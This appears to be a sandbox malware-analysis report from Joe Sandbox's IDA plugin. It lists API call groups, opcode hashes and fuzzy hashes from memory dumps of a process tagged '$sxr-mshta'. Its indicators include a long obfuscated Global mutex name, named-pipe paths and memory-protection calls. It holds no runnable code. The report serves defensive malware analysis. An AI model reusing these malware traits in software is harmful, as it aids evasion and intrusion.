                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 517849248-0
                                                                                                            • Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction ID: 6afdd469103f379db64996c8cfa30bc1b7527edcdf553316564fa564b1c4c2a3
                                                                                                            • Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction Fuzzy Hash: D4016D31701B419AEB14DB1AA4587A967A1F789FC2F88C038CE8D57B54DE3CC9C5C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 449555515-0
                                                                                                            • Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction ID: f8210f893dce83ceccaab412ba2a7218df0b250a25964d8c8b8a362a6cf4987f
                                                                                                            • Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction Fuzzy Hash: 0F1180757037409AFB219B29F4083A92BA0FB4AB83F048428CD4D67755EF3DC088C742
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 2395640692-629598281
                                                                                                            • Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction ID: e02e388889a0293784d9547e932927c8d51fedf1367219bd997b7ba9774167db
                                                                                                            • Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction Fuzzy Hash: E351D1327126008EEB54CF19E448B9D3BA5F356B8AF518124FE1E67B8ADB34C841C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                            • String ID: \\?\
                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                            • Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction ID: 54d4dfca6376f8c51e40232c4094d319cb2549e6940bd67141a105f8b552e8f3
                                                                                                            • Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction Fuzzy Hash: FDF0C2723016409AEB308B28F4947D96B61F745B8AF84D034CA4C5A955DF3CC6CCCB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CombinePath
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3422762182-91387939
                                                                                                            • Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction ID: 5b560047f8afd5aafab56e7499eb06e30cfde2d68a3c9ce1416091437136b670
                                                                                                            • Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction Fuzzy Hash: ABF08270705B8095EA018B5BF9151A96A61AB4AFD3F04D130DE6E77B29CF3CC8C58385
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction ID: 4667da9ab5f4ad758b3fce486beb0eda209f9700ed7b5af4586aa60f9eedb487
                                                                                                            • Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction Fuzzy Hash: 05F0A771B1370099FF458B69E4887E42B60EB8AB43F049019D51F56961CF3CC5C8C782
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction ID: 251089c3425067a83f03d0e059806dcf44cfdc876c4d586d8a52af57f1c8afba
                                                                                                            • Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction Fuzzy Hash: 5402E032219B808AE760CF59F45439ABBA0F3C5795F104115EB8E97BA9DF7CC494CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2210144848-0
                                                                                                            • Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction ID: f86b0c21a1988d1b447e3df4ea652d7f1e7401274a066c733c608cff726f6858
                                                                                                            • Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction Fuzzy Hash: A88104327166448CFB129F6CC8503ED2FA1F756B8AF458119DE0E7B796DB348882C392
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                            • Instruction ID: 3881b159e52fa2847ddae10ec326ef446fa70dd60557a96e19fd9e5b3467f696
                                                                                                            • Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                            • Instruction Fuzzy Hash: 4F61303261AB80CBEB64CB19E44039A7BE0F389746F105116EA8D57BA9DB7CC550CF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction ID: a9d352d0960d56c33294a89242783f0a41a3526790df0315ca3bd5c72a0722b4
                                                                                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction Fuzzy Hash: 3B11A732B55B0509FA5A136ED4553E51940BB77372F14C634BA6F363D6CB2848C163C3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction ID: df60be486fa03a822db36ac1cc4ec4760dd7791901d6f8e5baa2a5e0eaef6986
                                                                                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction Fuzzy Hash: 8611A333B56E0101FAEC11EBE4913E99C70AB5F374FC80624AA67C6EDE8A148C416283
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1452528299-0
                                                                                                            • Opcode ID: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
                                                                                                            • Instruction ID: afedb49b93f5282fbd0f4f08ce41f77d5cf9362e5f64a08a9f6af3aaa3c330e6
                                                                                                            • Opcode Fuzzy Hash: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
                                                                                                            • Instruction Fuzzy Hash: AF116A757032414EFE159B2D98007D52A51AB8A7A2F184A24E92D37FD7DE38D84287C2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092925422-0
                                                                                                            • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction ID: 4063ca973c83d04121031b10890a0ed723de865bbbfc7d02c7fc40f0a1be5d69
                                                                                                            • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction Fuzzy Hash: 17118F36706B4087EB24CB2AE4442DABBB0F746B82F048029DE8C13795EF7DC948C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 3242871069-629598281
                                                                                                            • Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                            • Instruction ID: b2b64304aebdacbabd4f642863a7f83068d0cb70c11fe1ca55ac9618cc19312c
                                                                                                            • Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                            • Instruction Fuzzy Hash: 4051E6367136008BEB54CF55D404BDDBB95F34AB88F918920DE5A87788EBB6C981C782
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 3242871069-629598281
                                                                                                            • Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                            • Instruction ID: 94726f2286672b7ec900405ff3bbb1d2fecaa7b73b9066aabf2ede55ddb5762d
                                                                                                            • Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                            • Instruction Fuzzy Hash: F331B33230274096E714DF56E8447D9BBA4F34ABC8F858414EE9687784CB79C940CB86
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            • Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                            • Instruction ID: 319b0697934bad70bd6088f9d4e5e7c155fd0ae2c7668c7ed188eec6fbc58b31
                                                                                                            • Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                            • Instruction Fuzzy Hash: 2271CF327027804AEB249F2EDA453EE6B90F786786F554016DE4D63B9ADF35CA00C782
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            • Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                            • Instruction ID: 7e63f0771d7215c13fc66341b7d4fb5c2d4d0b5ab73bcee7ba6e6331ea733ea4
                                                                                                            • Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                            • Instruction Fuzzy Hash: 8651053230A3D14AFA359B2DA1447EE6F91F797782F065025DE8D23B9BCA39C50187C2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID: U
                                                                                                            • API String ID: 442123175-4171548499
                                                                                                            • Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                            • Instruction ID: 268954b8612093be874be9a8247c3e032634363a72549ea68396d1a34a35c881
                                                                                                            • Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                            • Instruction Fuzzy Hash: 4E410C3231AA4095EB11CF29E4443DA7BA0F749795F418121DE4D97798DF3CC542CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001ACEA2D2A4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction ID: f61167e2651820de8591d07a720a3934170979ca94e3cffa0351caf0fc8d3f49
                                                                                                            • Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction Fuzzy Hash: 9021D3363067408AE775CB1AB84079ABBA0F796B82F468019DE8D67755EF34C885C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001ACEA2D2B39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction ID: 43131cdc840e7214e32c2703c3ce4f9ce2929e2c21a5b1eef7140ca923e83d80
                                                                                                            • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction Fuzzy Hash: 882104327017408AE760DF1EB84079E7BA2F78AB42F468025DE8CA3755EF74C486C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Stringtry_get_function
                                                                                                            • String ID: LCMapStringEx
                                                                                                            • API String ID: 2588686239-3893581201
                                                                                                            • Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                            • Instruction ID: 16a0683443718a9d4b00cb92a0636272508c9588a9dca63bfcf66a1a8a2c8b52
                                                                                                            • Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                            • Instruction Fuzzy Hash: 10111F35709BC08AD761CB1AF44069ABBA4F7CAB81F548115EECD93B59DF38C4508B80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                            • Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                            • Instruction ID: acdbfa7475188e3bd5fd23afba0984237a40c88ef4739296bb2d9f40457d536d
                                                                                                            • Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                            • Instruction Fuzzy Hash: F0115132215B4086EB118F29F4403997BA1F789B95F188620EF8D17B65DF3DC555C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                            • API String ID: 539475747-3084827643
                                                                                                            • Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                            • Instruction ID: e81a5d312564488f4778b9a82c6d453bf304c095f630db13c3ae49f3ed1ab847
                                                                                                            • Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                            • Instruction Fuzzy Hash: 84F0E235B02B8096FB068B4DF4006D82A60FF89B92F44C062E95D23B15CF38C8C4C7C2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Valuetry_get_function
                                                                                                            • String ID: FlsSetValue
                                                                                                            • API String ID: 738293619-3750699315
                                                                                                            • Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                            • Instruction ID: 4a713e8bead376a6cf45cf616d1204bcb9d4c535a8f3a30230fff1d5908b58b8
                                                                                                            • Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                            • Instruction Fuzzy Hash: 76E09B71703A409AEF065B5DF8006D42B61BB8A782F48C026D92D16355CF38C8D4C7C2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 756756679-0
